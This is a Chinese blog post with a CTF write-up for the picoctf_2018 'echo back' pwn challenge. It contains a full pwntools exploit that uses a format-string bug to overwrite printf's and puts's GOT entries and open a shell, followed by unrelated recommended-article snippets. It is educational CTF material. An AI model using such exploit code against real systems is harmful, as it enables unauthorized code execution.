picoctf_2018_echo back

最新推荐文章于 2022-04-26 16:54:24 发布
最新推荐文章于 2022-04-26 16:54:24 发布
阅读量449 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123772032
版权

picoctf_2018_echo back

查看保护
在这里插入图片描述
在这里插入图片描述
有个格式化漏洞
攻击思路:利用格式化将printf_got改为system,但是只有一次,所以我们可以改fini段,或者将下面的puts_got改成vuln让程序继续运行一下,这样就可以输入/bin/sh来getshell了

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27771)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

offest = 7

printf_got = 0x0804A010
puts_got = 0x0804A01C
vuln_addr = 0x080485AB

p1 = p32(printf_got + 2) + p32(printf_got + 2) + p32(printf_got) + p32(puts_got)
p1 += b'%2036c%7$hn' + b'%8$hn' + b'%31836c%9$hn' + b'%331c%10$hn'

r.recvuntil('message:\n')

r.send(p1)

r.recvuntil('message:\n')
r.sendline('/bin/sh\x00')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
miniSpirit.github.io
03-31
miniSpirit.github.io
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2867
BUUCTF picoctf_2018_echo back
[BUUCTF-pwn]——picoctf_2018_echo back
Y_peak的博客
04-03 391
[BUUCTF-pwn]——picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1 思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好 找偏移, 为7 不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。 exploit from pwn import* p=remote('node3.buuoj.cn',27945)
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 338
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
uart_echo.rar_Echo Echo
09-23
"Echo Echo"项目显然涉及到通过UART接口实现数据的回显功能,即设备接收到的数据会被原样返回。这个过程有助于调试通信链路,确保数据正确传输。 在UART通信中,数据通常以字节流的形式发送,每字节包含8位数据,...
uart_echo.zip_Echo Echo_echo测试串口_uartecho
09-20
"Echo Echo_echo测试串口_uartecho"指的是通过UART接口进行的回环测试,这是一种验证UART通信是否正常的基本方法。在这个场景中,LM4FLaunchpad是一款基于德州仪器(TI)LM4F微控制器的开发板,它内置了UART功能,...
aes.rar_Echo Echo_acoustic echo
09-24
标题中的"aes.rar_Echo Echo_acoustic echo"表明这是一个与AES(Acoustic Echo Cancellation)技术相关的压缩包,其中可能包含了一些关于消除回声的音频处理资料。"Echo Echo_acoustic echo"这部分可能是对主题的...
tcpecho.zip_Echo Echo_echo server_echotcpip
09-22
【TCP/IP Echo 服务器原理与实现】 在计算机网络通信中,Echo 服务器是一种常见的测试工具,它接收客户端发送的数据并原样返回,主要用于检查网络连接的可靠性。"tcpecho.zip" 包含了一个基于 TCP/IP 实现的 Echo ...
lfd.rar_Echo Echo
09-20
`Echo Echo`这个标题可能指的是一个项目或工具,它与Linux内核配置文件`.config`的处理有关。`.config`文件是Linux内核编译时的配置选项,包含了内核支持的功能模块和参数,这些设置直接影响到内核的性能和功能。...
攻防世界PWNecho_back题解
seaaseesa的博客
11-17 2446
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
开题报告达达宠物认领信息网站的设计与实现 已通过开题答辩的.docx
07-25
宠物认领信息网站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的网站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,网站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息网站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,网站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
开题报告创权法律服务系统 已通过开题答辩的.doc
07-25
进入20世纪80年代,我国加快了改革开放的步伐,市场经济体制已逐步形成,我国的经济发展受世人所瞩目,但法律法规的置后,使经济发展不规范问题暴露的相当严重,特别是社会整体信用的缺失,使消费环境不断恶化。而如今随着城镇化的高速推进,精神追求远不及物质发展迅速,维权问题也越来越成为人们十分关注的社会话题。 维权是指维护个人或群体的合法权益,范围包括人身损害、土地纠纷、 医疗事故、婚姻、家庭、继承等民事纠纷所进行的行政及司法诉讼。维护消费者合法权益关系着全社会每个人的利益,群众利益无小事。维护消费者合法权益正体现着“权为民所用,利为民所谋”。而现如今由于法律规则的不完善加上自身对法律知识的不了解,导致很多公民的权益问题在复杂的社会情况下无法得到妥善的解决,使得公民的财产和心理受到难以弥补的损失,严重威胁到社会的安全与稳定,公民之间的诚信与统一。因此更便捷、迅速地维护公民的合法权益,已经成为了一个刻不容缓去解决的社会问题。
Matlab实现豪猪优化算法CPO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
人力资源-6 团结一致共创未来新员工座谈会.pptx
07-25
人力资源-6 团结一致共创未来新员工座谈会.pptx
《AI大模型应用》--基于PepperBot,可以保留上下文的LLM群聊机器人实现.zip
07-25
上接OpenAI、文心一言,下接QQ、微信、Telegram 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸!
开题报告传统糕点 已通过开题答辩的.docx
07-25
理论意义: 1、网页设计是信息传播的重要手段,通过合理的布局、图文搭配等设计元素,可以更好地传递传统糕点的信息。理论上,这涉及到传播学、信息传递模型等方面的理论研究,确保信息能够被受众准确、清晰地接收。 2、用户体验理论强调用户与网页之间的交互和感知。在传统糕点推广网页设计中,理论上的考虑应该包括用户友好的界面、易于导航的网站结构,以及引导用户深入了解传统糕点的设计元素。
GBT 2423.1-2008-试验A-低温
最新发布
07-25
GBT 2423.1-2008-试验A-低温
module sr04( input clk , input rst_n , input echo , output wire trig , output echo_d, output [7:0] distance ); parameter INTERVAL = 5_000_000; //100ms reg [22:0] cnt ; reg [24:0] echo_cnt_reg[3:0], echo_cnt; wire [21:0] echo_mean; reg [1:0] addr; reg echo_1,echo_2; wire echo_flag; wire echo_h; assign echo_h = (~echo_2) & echo_1; assign echo_d = (~echo_1) & echo_2; assign trig = (cnt < 500) ? 1 : 0; assign distance = echo_mean * 78 / 1_000_000; assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr <= 0; echo_cnt_reg[0] <= 0; echo_cnt_reg[1] <= 0; echo_cnt_reg[2] <= 0; echo_cnt_reg[3] <= 0; end else if(echo_d)begin echo_cnt_reg[addr] <= echo_cnt; if(addr == 3) addr <= 0; else addr <= addr + 1; end else begin addr <= addr; echo_cnt_reg[addr] <= echo_cnt_reg[addr]; end end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin cnt <= 0; end else if(cnt == INTERVAL) cnt <= 0; else cnt <= cnt + 1'b1; end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin echo_1 <= 0; echo_2 <= 0; end else begin echo_1 <= echo ; echo_2 <= echo_1; end end always @(posedge clk or negedge rst_n) begin if(!rst_n) echo_cnt <= 0; else if(!cnt) echo_cnt <= 0; else if(echo) echo_cnt <= echo_cnt + 1; else echo_cnt <= echo_cnt; end endmodule 分析其中的核心代码及其功能
06-07
assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr ; echo_cnt_reg[0] ; echo_cnt_reg[1] ; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值